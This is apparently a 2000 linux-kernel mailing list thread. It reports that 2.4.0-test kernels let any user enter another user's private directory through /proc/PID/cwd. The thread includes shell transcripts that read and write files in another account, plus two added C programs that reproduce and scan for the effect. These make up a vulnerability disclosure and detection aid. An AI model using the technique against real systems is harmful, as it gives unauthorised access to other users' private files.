* 2.4.(0-test10): /proc security hole
@ 2000-11-05 13:02 Lutz Pressler
  2000-11-06  0:29 ` Jan Dvorak
  0 siblings, 1 reply; 2+ messages in thread
From: Lutz Pressler @ 2000-11-05 13:02 UTC (permalink / raw)
  To: linux-kernel

Hello,

I do not think that the following behaviour (2.4.0-test10 on i386, also
tested with 2.4.0-test8) is intended: 

testuser@vax:~ > id
uid=503(testuser) gid=100(users) groups=100(users)
testuser@vax:~ > ls -lad .
drwx------   7 testuser users        4096 Nov  5 13:38 .

testuser@vax:~ > cd dir
testuser@vax:~/dir > ls -la 
total 16
drwxr-xr-x   3 testuser users        4096 Nov  5 13:39 .
drwx------   7 testuser users        4096 Nov  5 13:38 ..
-rw-r--r--   1 testuser users           7 Nov  5 13:39 file
drwxrwxr-x   2 testuser users        4096 Nov  5 13:39 subdir


Myself (lpressl, uid=500) cannot change into /home/testuser/dir,
as expected:
lpressl@vax:~ > cd ~testuser/dir
bash: cd: /home/testuser/dir: Permission denied

BUT: let testuser be logged in and have a process (bash) with cwd
/home/testuser/dir. Then
lpressl@vax:~ > ps uax |grep testuser
yields
...
testuser   588  0.0  2.1  2256 1360 tty2     S    13:38   0:00 -bash
...

lpressl@vax:~ > cd /proc/588
lpressl@vax:/proc/588 > ls -la
total 0
dr-xr-xr-x   3 testuser users     0 Nov  5 13:49 .
dr-xr-xr-x  59 root     root      0 Nov  5 13:34 ..
-r--r--r--   1 testuser users     0 Nov  5 13:49 cmdline
lrwxrwxrwx   1 testuser users     0 Nov  5 13:49 cwd -> /home/testuser/dir
-r--------   1 testuser users     0 Nov  5 13:49 environ
lrwxrwxrwx   1 testuser users     0 Nov  5 13:49 exe -> /bin/bash
dr-x------   2 testuser users     0 Nov  5 13:49 fd
-r--r--r--   1 testuser users     0 Nov  5 13:49 maps
-rw-------   1 testuser users     0 Nov  5 13:49 mem
lrwxrwxrwx   1 testuser users     0 Nov  5 13:49 root -> /
-r--r--r--   1 testuser users     0 Nov  5 13:49 stat
-r--r--r--   1 testuser users     0 Nov  5 13:49 statm
-r--r--r--   1 testuser users     0 Nov  5 13:49 status

cd cwd shouldn't be possible, should it? But let's see:
lpressl@vax:/proc/588 > cd cwd
lpressl@vax:/proc/588/cwd > 

Oops....

lpressl@vax:/proc/588/cwd > ls -la
total 16
drwxr-xr-x   3 testuser users        4096 Nov  5 13:39 .
drwx------   7 testuser users        4096 Nov  5 13:38 ..
-rw-r--r--   1 testuser users           7 Nov  5 13:39 file
drwxrwxr-x   2 testuser users        4096 Nov  5 13:39 subdir

lpressl@vax:/proc/588/cwd > cat file
secret
lpressl@vax:/proc/588/cwd > cd subdir
lpressl@vax:/proc/588/cwd/subdir > 
lpressl@vax:/proc/588/cwd/subdir > echo ohoh > newfile
lpressl@vax:/proc/588/cwd/subdir > ls -la
total 12
drwxrwxr-x   2 testuser users        4096 Nov  5 13:53 .
drwxr-xr-x   3 testuser users        4096 Nov  5 13:39 ..
-rw-r--r--   1 lpressl  users           5 Nov  5 13:53 newfile


This is bad. 2.2 kernels don't show this behavior. There _any_
/proc/PID/cwd "directory" has no group or world permissions
at all.

I haven't looked at the code at all yet. Anybody with a fix?


Regards,
  Lutz
  


-- 
  _              |  Lutz Pressler          |  Tel: ++49-551-3700002
 |_     |\ |     |  Service Network GmbH   |  FAX: ++49-551-3700009
 ._|ER  | \|ET   |  Bahnhofsallee 1b       |   mailto:lp@SerNet.DE
Service Network  |  D-37081 Goettingen     |  http://www.SerNet.DE/
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
Please read the FAQ at http://www.tux.org/lkml/
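The report above shows the effect from a second account. The mechanism can be reproduced inside a single unprivileged account, because what /proc/PID/cwd hands out is the directory the process already sits in, not a re-walk of its path: once a process has chdir'ed into a directory, removing the execute bit from a parent blocks the path but not the link. The program below is an added example written for this page, not code from the original post or the kernel; it assumes a Linux system with /proc mounted and a writable /tmp, and the scratch layout /tmp/proccwd-XXXXXX/outer/inner is a hypothetical one chosen here.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* errno from opening a directory read-only, 0 on success. */
static int open_dir_err(const char *path)
{
    int fd = open(path, O_RDONLY | O_DIRECTORY | O_CLOEXEC);
    if (fd < 0)
        return errno;
    close(fd);
    return 0;
}

/* One probe: errno when opening our cwd by its path, and when opening it
 * through the /proc/self/cwd link (0 = opened fine). */
struct probe {
    int path_err;
    int proc_err;
};

/* Create <scratch>/outer/inner, chdir into inner, then chmod 000 outer so the
 * *path* to inner can no longer be traversed.  The process still holds inner
 * as its cwd, like testuser's bash in the report, and /proc/self/cwd resolves
 * from that cwd rather than from the path.  Returns 0 and fills *out, or -1
 * if the scratch setup failed.  Everything is cleaned up afterwards. */
int magic_link_probe(struct probe *out)
{
    char base[] = "/tmp/proccwd-XXXXXX";   /* hypothetical scratch location */
    char outer[PATH_MAX], inner[PATH_MAX];
    int save, rc = -1;

    if (!mkdtemp(base))
        return -1;
    snprintf(outer, sizeof outer, "%s/outer", base);
    snprintf(inner, sizeof inner, "%s/inner", outer);

    save = open(".", O_RDONLY | O_DIRECTORY | O_CLOEXEC);   /* to restore cwd */
    if (save < 0)
        goto out_base;
    if (mkdir(outer, 0700) || mkdir(inner, 0755) || chdir(inner))
        goto out_dirs;

    chmod(outer, 0000);                                /* block path traversal   */
    out->path_err = open_dir_err(inner);               /* EACCES unless root     */
    out->proc_err = open_dir_err("/proc/self/cwd");    /* still opens: 0         */
    chmod(outer, 0700);                                /* so cleanup can proceed */
    rc = 0;

out_dirs:
    fchdir(save);
    close(save);
    rmdir(inner);
    rmdir(outer);
out_base:
    rmdir(base);
    return rc;
}

/* Verdict only: 1 when /proc/self/cwd opened although the path was refused
 * with EACCES, 0 when both routes agreed (e.g. running as root, which bypasses
 * the mode bits on both), -1 when the scratch setup failed. */
int cwd_bypass_observed(void)
{
    struct probe p;
    if (magic_link_probe(&p))
        return -1;
    return p.proc_err == 0 && p.path_err == EACCES;
}

int main(void)
{
    struct probe p;
    if (magic_link_probe(&p)) {
        perror("setup");
        return 2;
    }
    printf("open by path:        %s\n", p.path_err ? strerror(p.path_err) : "ok");
    printf("open /proc/self/cwd: %s\n", p.proc_err ? strerror(p.proc_err) : "ok");
    return 0;
}
```

Run it as a normal user and the path open fails with "Permission denied" while the /proc/self/cwd open succeeds. That is the same property the report relies on; what made it a hole in 2.4.0-test10 is that the kernel let any user, not just the owner of the process, follow the link.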


* Re: 2.4.(0-test10): /proc security hole
  2000-11-05 13:02 2.4.(0-test10): /proc security hole Lutz Pressler
@ 2000-11-06  0:29 ` Jan Dvorak
  0 siblings, 0 replies; 2+ messages in thread
From: Jan Dvorak @ 2000-11-06  0:29 UTC (permalink / raw)
  To: Lutz Pressler; +Cc: linux-kernel

On Sun, Nov 05, 2000 at 01:02:14PM +0000, Lutz Pressler wrote:
> Hello,
> 
> I do not think that the following behaviour (2.4.0-test10 on i386, also
> tested with 2.4.0-test8) is intended: 
> 
..
> This is bad. 2.2 kernels don't show this behavior. There _any_
> /proc/PID/cwd "directory" has no group or world permissions
> at all.
> 
> I haven't looked at the code at all yet. Anybody with a fix?

I wonder that no one responds. I can confirm this - in 2.2.x links to cwd,
exe etc. pointed to nowhere (readlink failed) when there were insufficient
privileges to enter the dir. In 2.4.x the links blindly point to the directory,
setting all its privileges for access by /proc. Because everyone has dirs
drwxr-xr-x in his home, such dirs now become accessible through /proc if the user
is in them. This is a real security leak.

ex:

[johnydog@napalm 210]$ whoami
johnydog
[johnydog@napalm 210]$ pwd
/proc/210
[johnydog@napalm 210]$ ls -l ./cwd
lrwxrwxrwx    1 root     root            0 Nov  6 01:26 ./cwd -> /root/.mc
[johnydog@napalm 210]$ cd /root/.mc
bash: /root/.mc: Permission denied
[johnydog@napalm 210]$ cd cwd
[johnydog@napalm cwd]$ ls -l
total 53
-rw-r--r--    1 root     root           35 Nov  6 01:16 Tree
-rw-r--r--    1 root     root        13203 May 31 11:54 ext
-rw-------    1 root     root        15952 Nov  6 01:16 history
-rw-------    1 root     root           20 May  6  1998 hotlist
-rw-r--r--    1 root     root         6417 Nov  6 01:16 ini
drwx------    2 root     root         3072 Nov  6 01:16 tmp
-rw-r--r--    1 root     root        10121 Jun 30 17:04 tree
[johnydog@napalm cwd]$


Jan Dvorak <johnydog@go.cz>
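Both messages make the same observation by hand: readlink /proc/PID/cwd, try the target by its path, then try the link. The scanner below automates that comparison over every process visible in /proc and reports the ones whose cwd is refused by path but opens through the link. It is an added example written for this page, not code from either poster or from the kernel; it assumes Linux with /proc mounted and relies on the kernel's documented " (deleted)" suffix on cwd links to unlinked directories. The verdict names (V_LEAK and so on) are this example's own.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

enum verdict {
    V_NOPROC,   /* /proc/PID/cwd cannot be read: no /proc, no such pid, or refused */
    V_ALLOWED,  /* reachable by path and via /proc/PID/cwd alike: nothing to see   */
    V_DENIED,   /* refused both ways: the link honours the path permissions        */
    V_LEAK,     /* refused by path, but /proc/PID/cwd opens: the 2.4.0-test effect */
    V_OTHER     /* some other mix, e.g. cwd unlinked or outside our root           */
};

/* errno from opening a directory read-only, 0 on success. */
static int open_dir_err(const char *path)
{
    int fd = open(path, O_RDONLY | O_DIRECTORY | O_CLOEXEC);
    if (fd < 0)
        return errno;
    close(fd);
    return 0;
}

/* Read the cwd link target of pid into buf, dropping the " (deleted)" suffix
 * the kernel appends when the directory has been unlinked.  -1 on failure. */
static int cwd_target(pid_t pid, char *buf, size_t n)
{
    char link[64];
    snprintf(link, sizeof link, "/proc/%ld/cwd", (long)pid);
    ssize_t len = readlink(link, buf, n - 1);
    if (len < 0)
        return -1;
    buf[len] = '\0';
    char *del = strstr(buf, " (deleted)");
    if (del)
        *del = '\0';
    return 0;
}

/* Compare "cd <target>" with "cd /proc/PID/cwd" for one process. */
enum verdict check_pid(pid_t pid)
{
    char target[PATH_MAX], link[64];
    if (cwd_target(pid, target, sizeof target) < 0)
        return V_NOPROC;
    snprintf(link, sizeof link, "/proc/%ld/cwd", (long)pid);

    int by_path = open_dir_err(target);
    int by_proc = open_dir_err(link);
    if (by_path == 0 && by_proc == 0)
        return V_ALLOWED;
    if (by_path == EACCES && by_proc == 0)
        return V_LEAK;
    if (by_path == EACCES && by_proc != 0)
        return V_DENIED;
    return V_OTHER;
}

/* Walk every numeric entry in /proc; print and count the V_LEAK cases.
 * Returns the count, or -1 if /proc could not be opened. */
int scan_proc(void)
{
    DIR *d = opendir("/proc");
    if (!d)
        return -1;
    int leaks = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        char *end;
        long pid = strtol(e->d_name, &end, 10);
        if (*end != '\0' || pid <= 0)
            continue;               /* not a pid directory */
        if (check_pid((pid_t)pid) == V_LEAK) {
            char target[PATH_MAX];
            cwd_target((pid_t)pid, target, sizeof target);
            printf("pid %ld: %s refused by path but opens via /proc/%ld/cwd\n",
                   pid, target, pid);
            leaks++;
        }
    }
    closedir(d);
    return leaks;
}

int main(void)
{
    int n = scan_proc();
    if (n < 0) {
        perror("/proc");
        return 2;
    }
    printf("%d process(es) whose cwd is reachable only through /proc\n", n);
    return n ? 1 : 0;
}
```

On a kernel with the behaviour described in this thread, running the scanner as lpressl while testuser sits in ~testuser/dir prints that pid as a leak. On current kernels the kernel refuses both readlink() and traversal of another user's /proc/PID/cwd unless the caller may ptrace that process, so those processes come back V_NOPROC, the same outcome Jan describes for 2.2.x; only the caller's own processes, and those of users it may trace, reach the path comparison at all.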

